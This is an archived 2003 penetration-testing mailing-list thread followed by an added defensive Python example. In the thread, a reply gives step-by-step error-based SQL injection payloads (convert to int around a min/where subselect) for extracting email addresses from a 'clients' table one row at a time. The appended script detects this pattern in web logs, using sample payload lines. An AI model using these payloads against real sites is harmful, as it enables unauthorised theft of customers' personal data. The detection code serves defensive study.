I believe the solution you're looking for is the old min-where-order-by trick.

> ' %2b convert(int, (SELECT email FROM clients WHERE email > 'a')) %2b '

Try this:

> ' %2b convert(int, (SELECT min(email) FROM clients WHERE email > 'a' order by 1)) %2b '

After you get the first value (say it's anonat_private), you throw it into the where clause:

> ' %2b convert(int, (SELECT min(email) FROM clients WHERE email > 'anonat_private' order by 1)) %2b '

You get the next value, say it's axonat_private, then you do the next query:

> ' %2b convert(int, (SELECT min(email) FROM clients WHERE email > 'axonat_private' order by 1)) %2b '

And so on, until you don't get an error. Of course, for most gratifying results you write a little program that does this for you.

Phil

> -----Original Message-----
> From: Daniel Savi [mailto:dssat_private]
> Sent: Wednesday, February 12, 2003 12:49 PM
> To: pen-testat_private
> Subject: SQL injection - get more values
>
> Hi :)
>
> I'm trying to get some info from clients table and email field....
>
> I try this param into gubpage.asp?=...
> ') union select sum(email) from clients--
> and got error about all queries needed...so, I tried to solve with
> ') union select sum(email),1,1,1.... from clients--
> until I get: operand type clash: text is incompatible with int
>
> I found this answer into this forum (thanks :)), was:
> ' %2b convert(int, (SELECT email FROM clients WHERE email > 'a')) %2b '
>
> I got this:
> Syntax error converting the varchar value 'anonat_private' to a column of data type int
>
> Now, my problem: How can I get other e-mail from table knowing one valid value?
>
> I try this
> ' %2b convert(int, (SELECT email FROM clients WHERE email > 'anonat_private')) %2b '
> but no success
>
> I think I can use NOT IN, but not sure how to use with convert...
>
> Any tips are welcome!
>
> Thanks
>
> ----------------------------------------------------------------------------
> This list is provided by the SecurityFocus Security Intelligence Alert (SIA) Service. For more information on SecurityFocus' SIA service which automatically alerts you to the latest security vulnerabilities please see: https://alerts.securityfocus.com/
This archive was generated by hypermail 2b30 : Wed Feb 12 2003 - 13:27:01 PST
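
From the defending side, the walk described in this thread leaves a recognisable trail in web logs: one client repeatedly sending a `convert(int, (SELECT ...` probe whose `WHERE column > '...'` literal changes on each request, mostly answered with HTTP 500. The following is an added example, not part of the original thread, that flags that pattern; the log format, page name, parameter name and cursor values are constructed assumptions.

```python
import re
from collections import defaultdict
from urllib.parse import unquote

# Constructed sample log: "<client-ip> <status> <url-encoded request target>".
# Page name, parameter and cursor values are made up for this example.
_P = ("/page.asp?id='%20%2b%20convert(int,%20(SELECT%20min(email)%20FROM%20clients"
      "%20WHERE%20email%20>%20'{}'%20order%20by%201))%20%2b%20'")
SAMPLE_LOG = "\n".join([
    "10.0.0.5 200 /page.asp?id=42",
    "10.0.0.7 500 " + _P.format("a"),
    "10.0.0.9 500 " + _P.format("a"),          # single probe, below threshold
    "10.0.0.7 500 " + _P.format("alice"),
    "10.0.0.5 200 /search.asp?q=how%20to%20convert%20int%20to%20string",
    "10.0.0.7 500 " + _P.format("bob"),
    "10.0.0.7 200 " + _P.format("zed"),        # walk ends when no error comes back
])

# A string-to-int cast wrapped around a subselect: the error-based leak primitive.
CAST_PROBE = re.compile(r"convert\s*\(\s*int\s*,\s*\(\s*select\b", re.I)
# The moving "cursor": WHERE <column> > '<last value seen>'.
CURSOR = re.compile(r"\bwhere\s+(\w+)\s*>\s*'([^']*)'", re.I)


def find_enumeration(log_text, min_steps=3):
    """Return {ip: {"cursors": [...], "errors": n}} for clients that sent the
    cast probe with at least min_steps distinct cursor literals."""
    seen = defaultdict(lambda: {"cursors": [], "errors": 0})
    for line in log_text.splitlines():
        parts = line.split(" ", 2)
        if len(parts) != 3:
            continue                            # not in the assumed format
        ip, status, target = parts
        query = unquote(target)                 # %2b -> '+', %20 -> ' '
        cursor = CURSOR.search(query)
        if not CAST_PROBE.search(query) or not cursor:
            continue
        entry = seen[ip]
        if cursor.group(2) not in entry["cursors"]:
            entry["cursors"].append(cursor.group(2))
        entry["errors"] += status == "500"      # conversion errors leak the data
    return {ip: e for ip, e in seen.items() if len(e["cursors"]) >= min_steps}


if __name__ == "__main__":
    for ip, info in find_enumeration(SAMPLE_LOG).items():
        print(ip, info)
```
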